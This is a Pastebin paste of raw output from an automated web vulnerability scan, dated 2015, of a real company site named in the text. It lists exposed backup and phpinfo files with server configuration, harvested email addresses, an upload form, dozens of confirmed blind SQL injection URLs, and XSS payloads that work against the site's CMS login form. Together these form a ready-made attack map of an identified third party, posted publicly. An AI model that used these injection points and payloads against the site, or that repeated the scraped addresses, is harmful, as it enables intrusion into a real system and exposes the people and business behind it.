Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===================================================================================================
- | Domain: http://www.mascoc.com/
- | Server: Apache
- | IP: 82.98.134.88
- ===================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://www.mascoc.com/cms/
- | [+] CODE: 200 URL: http://www.mascoc.com/icons/
- ===================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://www.mascoc.com/error_log
- | [+] CODE: 200 URL: http://www.mascoc.com/index.cgi
- | [+] CODE: 200 URL: http://www.mascoc.com/index.do
- | [+] CODE: 200 URL: http://www.mascoc.com/index.cfm
- | [+] CODE: 200 URL: http://www.mascoc.com/index.htm
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html~
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html%20
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.bak
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ca
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.cz.iso8859-2
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.de
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.dk
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ee
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.el
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.en
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.et
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.es
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.he.iso8859-8
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.hr.iso8859-2
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.it
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ja.iso2022-jp
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.kr.iso2022-kr
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.lu.utf8
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ltz.utf8
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.nl
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.nn
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.no
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.po.iso8859-2
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt-br
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp-1251
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp866
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.iso-ru
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.koi8-r
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.se
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.utf8
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw.Big5
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.var
- | [+] CODE: 200 URL: http://www.mascoc.com/index.jhtml
- | [+] CODE: 200 URL: http://www.mascoc.com/index.php
- | [+] CODE: 200 URL: http://www.mascoc.com/index.php3
- | [+] CODE: 200 URL: http://www.mascoc.com/index.shtml
- | [+] CODE: 200 URL: http://www.mascoc.com/index.pl
- | [+] CODE: 200 URL: http://www.mascoc.com/index.html.fr
- | [+] CODE: 200 URL: http://www.mascoc.com/mailman/listinfo
- | [+] CODE: 200 URL: http://www.mascoc.com/phpinfo.php
- ===================================================================================================
- |
- | Check robots.txt:
- |
- | Check sitemap.xml:
- ===================================================================================================
- |
- | Crawler Started:
- | Plugin name: Upload Form Detect v.1.1 Loaded.
- | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
- | Plugin name: E-mail Detection v.1.1 Loaded.
- | Plugin name: FCKeditor upload test v.1 Loaded.
- | Plugin name: phpinfo() Disclosure v.1 Loaded.
- | Plugin name: Code Disclosure v.1.1 Loaded.
- | Plugin name: External Host Detect v.1.2 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | [+] Crawling finished, 72 URL's found!
- |
- | File Upload Forms:
- | [+] Upload Form Found: http://www.mascoc.com/cargar/
- |
- | Web Backdoors:
- |
- | E-mails:
- | [+] E-mail Found: kevinh@kevcom.com
- | [+] E-mail Found: mailman@d448.dinaserver.com
- | [+] E-mail Found: license@php.net
- | [+] E-mail Found: ventas@mascoc.com
- | [+] E-mail Found: ricambi@elevatorisrl.com
- | [+] E-mail Found: soporte@mascoc.com
- | [+] E-mail Found: info@mascoc.com
- | [+] E-mail Found: mike@hyperreal.org
- | [+] E-mail Found: webmaster@mascoc.com
- |
- | FCKeditor File Upload:
- |
- | PHPinfo() Disclosure:
- | [+] phpinfo() page: http://www.mascoc.com/phpinfo.php
- | System: Linux d448.dinaserver.com 2.6.32.48-grsec-dh #1 SMP Thu Nov 24 09:29:43 CET 2011 x86_64
- | allow_url_fopen: On
- | allow_url_include: Off
- | disable_functions: <i>no value</i>
- | safe_mode: Off
- | safe_mode_exec_dir: <i>no value</i>
- |
- | Source Code Disclosure:
- |
- | External hosts:
- | [+] External Host Found: http://ajax.googleapis.com
- | [+] External Host Found: http://maps.google.com
- | [+] External Host Found: http://d448.dinaserver.com
- | [+] External Host Found: http://www.hardened-php.net
- | [+] External Host Found: http://css3-mediaqueries-js.googlecode.com
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: http://www.gnu.org
- | [+] External Host Found: http://html5shim.googlecode.com
- |
- | Timthumb:
- |
- | Ignored Files:
- ===================================================================================================
- | Dynamic tests:
- | Plugin name: Learning New Directories v.1.2 Loaded.
- | Plugin name: FCKedior tests v.1.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: Find Backup Files v.1.2 Loaded.
- | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
- | Plugin name: Local File Include tests v.1.1 Loaded.
- | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
- | Plugin name: Remote Command Execution tests v.1.1 Loaded.
- | Plugin name: Remote File Include tests v.1.2 Loaded.
- | Plugin name: SQL-injection tests v.1.2 Loaded.
- | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
- | Plugin name: Web Shell Finder v.1.3 Loaded.
- | [+] 1 New directories added
- |
- |
- | FCKeditor tests:
- |
- |
- | Timthumb < 1.33 vulnerability:
- |
- |
- | Backup Files:
- |
- |
- | Blind SQL Injection:
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=3+AND+1=1
- | [+] Keyword: FERGUSON
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=4+AND+1=1
- | [+] Keyword: ELEVADORA
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=5+AND+1=1
- | [+] Keyword: lavado
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=2+AND+1=1
- | [+] Keyword: comerciales
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=3+AND+1=1
- | [+] Keyword: MODELO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=4+AND+1=1
- | [+] Keyword: LIFTLUX
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=6+AND+1=1
- | [+] Keyword: QUIJADA
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=1+AND+1=1
- | [+] Keyword: HOLLAND
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=2+AND+1=1
- | [+] Keyword: HOLLAND
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=1+AND+1=1
- | [+] Keyword: construccion
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=22+AND+1=1
- | [+] Keyword: FERGUSON
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=29+AND+1=1
- | [+] Keyword: ELEVADORA
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=74+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=73+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=72+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=20+AND+1=1
- | [+] Keyword: Habana
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=21+AND+1=1
- | [+] Keyword: conclusi�n
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=26+AND+1=1
- | [+] Keyword: amilan
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=71+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=29+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=5+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=69+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=70+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=7+AND+1=1
- | [+] Keyword: CONTENIDO
- | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=6+AND+1=1
- | [+] Keyword: CONTENIDO
- |
- |
- | Local File Include:
- |
- |
- | PHP CGI Argument Injection:
- |
- |
- | Remote Command Execution:
- |
- |
- | Remote File Include:
- |
- |
- | SQL Injection:
- |
- |
- | Cross-Site Scripting (XSS):
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><script>alert('XSS')</script>&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><IMG SRC="javascript:alert('XSS');">&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><DIV STYLE="background-image: url(javascript:alert('XSS'))">&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><body onload="javascript:alert('XSS')"></body>&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario="><table background="javascript:alert('XSS')"></table>&clave=123
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><script>alert('XSS')</script>
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><IMG SRC="javascript:alert('XSS');">
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><body onload="javascript:alert('XSS')"></body>
- | [+] Vul [XSS] http://www.mascoc.com/logincms.php
- | Post data: &usuario=123&clave="><table background="javascript:alert('XSS')"></table>
- |
- |
- | Web Shell Finder:
- ===================================================================================================
- | Static tests:
- | Plugin name: Local File Include tests v.1.1 Loaded.
- | Plugin name: Remote Command Execution tests v.1.1 Loaded.
- | Plugin name: Remote File Include tests v.1.1 Loaded.
- |
- |
- | Local File Include:
- |
- |
- | Remote Command Execution:
- |
- |
- | Remote File Include:
- ===================================================================================================
- Scan end date: 24-10-2015 23:6:41
- HTML report saved in: report/www.mascoc.com.html
Add Comment
Please, Sign In to add comment